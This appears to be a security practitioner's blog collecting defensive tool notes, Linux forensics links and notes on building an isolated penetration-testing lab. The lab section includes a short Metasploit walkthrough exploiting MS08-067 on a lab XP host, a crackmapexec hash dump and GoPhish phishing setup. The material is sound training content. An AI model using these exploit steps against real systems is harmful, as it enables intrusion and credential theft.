Facebook-developed osquery and this tool can give you all you need.

Agents for MacOS, Windows, Linux

Deploy across your enterprise w/ Chef, Puppet, or SCCM

Do fun things like search for IoC’s (FBI file hashes, processes) – pipe the data into ElasticStack for visibility & search-ability

User Data Discovery

OpenDLP – (github) or (download an .ova) – will scan file shares and using a normal user account you can scan for available shares and data. Run over the weekend and see what you can find. Find the data owners and determine where the data should reside.

Hardening Your Network

CIS Benchmarks – Center for Internet Security Benchmarks: 100+ configuration guidelines for various technology groups to safeguard systems against today’s evolving cyber threats.

Out of the box, windows 10 is 22% for the CIS benchmark.

It’s difficult to secure your network if everything is a snowflake. While not exciting, configuration management is important. Deploy configs across your org using tools like GPO, Chef, or Puppet.

Change management is also important – use git repo for trackign changes to your config scripts.

Safety vs. Risk

Scanning for Vulnerabilities:

OpenVAS (greenbone) is a fork of Nessus which is still maintained, is the default vulnerability scanner in AlienVault. It does a great job in comparison with commercial products. Be careful, do some safe scans first and it’s not recommended to scan critical life-support equipment for example in a hospital.

Scan web apps:

Arachni Framework – for finding bugs in your developer’s code

OWASP ZAP (Zed Attack Proxy)

Nikto2 (Server config scanner)

Portswigger Burp Suite (not free – $350)

Harden your web servers:

Fail2ban – python-based IPS that runs off of Apache Logs

ModSecurity – Open source WAF for Apache & IIS

Linux Digital Forensics Web Resources

Below is a list of digital forensics resources for linux. I especially enjoyed reading LUIS ROCHA‘s intro guide to Linux Forensics (#19).

  1. VirusTotal – Free Online Virus, Malware and URL Scanner
  2. TSK Tool Overview – SleuthKitWiki
  3. The Sleuth Kit
  4. Taking advantage of Ext3 journaling file system in a forensic investigation
  5. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 1)- Extents – SANS Institute
  6. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 2)- Timestamps – SANS Institute
  7. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 3)- Extent Trees – SANS Institute
  8. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 4)- Demolition Derby – SANS Institute
  9. SANS Digital Forensics and Incident Response Blog – Understanding EXT4 (Part 5)- Large Extents – SANS Institute
  10. SANS Digital Forensics and Incident Response Blog – How To – Digital Forensics Copying A VMware VMDK – SANS Institute
  11. SANS Digital Forensics and Incident Response Blog – Blog – SANS Institute
  12. qemu-img(1)- QEMU disk image utility – Linux man page
  13. qemu-img for WIndows – Cloudbase Solutions
  14. National Software Reference Library (NSRL) – NIST
  15. ltrace – Wikipedia
  16. Logical Volume Manager (204.3)
  17. Linux-Unix and Computer Security Resources – Hal Pomeranz – Deer Run Associates
  18. The Law Enforcement and Forensic Examiner’s Introduction to Linux
  19. Intro to Linux Forensics – Count Upon Security
  20. https—www.kernel.org-doc-Documentation-filesystems-ext4.txt
  21. GitHub – log2timeline-plaso- Super timeline all the things
  22. Filesystem Hierarchy Standard
  23. Digital Forensics – SuperTimeline & Event Logs – Part I – Count Upon Security
  24. Digital Forensics – NTFS Metadata Timeline Creation – Count Upon Security
  25. Digital Forensics – Evidence Acquisition and EWF Mounting – Count Upon Security
  26. chkrootkit — locally checks for signs of a rootkit

Building a penetration test lab – Part 1

Notes on how to create a Penetration Testing Lab

I’ve always had an interest in penetration testing and have messed around with nmap and nessus, but now I’m going to dig in my heels and become proficient using the tools in the pen-test theater. The following post is more of an outline of what is found in a youtube video I found here at Derbycon 2016. This speaker was inspiring as well as a few others who’ve spoken because they said that Sysadmins make good penetration testers. They mentioned that someone who is good at building systems and networks in general do well at breaking them down and actively locating and fixing problems in other systems. I am not looking to become a script kiddy, or a black hat/dark side cracker for that matter, but I do hope to become proficient with the tools they use, as well as work with python to build my own tools.

Since I last upgraded my vm server to proxmox, I’ve been kicking around ideas on how to use the hardware to it’s fullest potential. I’ve already gotten started by by first creating a new network on my proxmox host, and started up my first server in my segrated ‘insecure’ network by spinning up an isc-dhcp-server. I’ll probably post info on my build as I go along so stay tuned.

-Start of Video notes-

Credit: David Boyd
Pentest lab requirements:

  • Core i5 CPU
  • 16gb RAM
  • 250-500GB HDD
  • 7zip

VM software:

  • virtualbox
  • VMWare
  • Hyper-V
  • (I’ll be using) ProxMox

Pentesting platforms:

  • Kali Linux
  • Samurai WTF (WebAppTesting)
  • SamuraiSTFU(Utility Hacking)
  • Deft Linux (Forensics)

Old stuff:

  • olpix (?)
  • IWax(?)
  • backtrack (now Kali)

Offensive Security has – pre-compiled linux distro

Note: generate your own SSH keys

Now need something to attack…
Vulnerable VM’s:

  • Metasploitable 2 (Metasploit) – intentionally vulnerable Ubuntu has remote logins, backdoors, default pwds, vulnerable web services
  • Morning Catch (Phishing)
  • OWASP BrokenWebApplications (WebApps)
    WebGoat (Web Applications)
  • vulnhub.com (challengeVMs)
  • Kioptrix (Beginners)
  • PwnOS

Guides to pen expoits:
https://community.rapid7.com/docs/DOC-1875

Introducing Morning Catch
http://blog.cobaltstrike.com/2014/08/06/introducing-morning-catch-a-phishing-paradise/ – real working phishing lab

Sans Mutillidae Whitepaper
https://www.sans.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380

VM’s to build and test:

Do not expose vulnerable vm’s to internet!
Make them hosts only (or in proxmox create a new bridge)

More tools:

  • nmap
  • nessus
  • cain (still works)
  • responder
  • john the ripper/hashcat
  • metasploit (freeversion works great)
  • SET/GoPhish/SPF (social engineering)
  • Discover Scripts – great stuff – great reconnisance
  • PowershellEmpire
  • CrackMapExec (post exploit)

How to Build a test domain controller, and add users with various privileges:
http://thehackerplaybook.com/windows-domain.htm

Once the virtual machines have been setup and set to ‘host only’
ping each vm

Initial testing and exploit example:

On Kali:
nmap 192.168.110.2 (XP)
nmap -O 192.168.110.2 (checks for OS)
msfconsole
msf> search ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
(shows mudule options)
msf exploit(ms08_067_netapi) > set RHOST 192.168.110.2
msf exploit(ms08_067_netapi) > exploit

kali:`# crackmapexec
(dumps hashes)

phishing server – load up goPhish – setup add users, make campaign

Additional training:
Metasploit unleashed
https://www.offensive-security.com/metasploit-unleashed

Hack This Site!
https://www.hackthissite.org/reading-room/whitepapers/testing/introduction-owasp-mutillidae-ii-web-pen-test-training-environment-34380
Youtube videos:
Derbycon, BSides, DefCon, ISSA

More information: Sans Cyber Aces, InfoSec Institute, Cybrary

It’s wise to find a mentor, as well as do some mentoring

Recommended reading (actual paper books):

  • The hacker playbook
  • Penetration Testing – a hands-on introduction to hacking – george wymann
  • Metasploit – The Penetration Tester’s Guide
  • Hacking – The art of exploitation Erickson
  • Professional Penetration Testing
  • The Art of Intrusion – kevin mitnick
  • The art of deception – kevin mitnick
  • Ghost in the wires – kevin mitnick
  • Black Hat Python – Jason Street

-End video notes-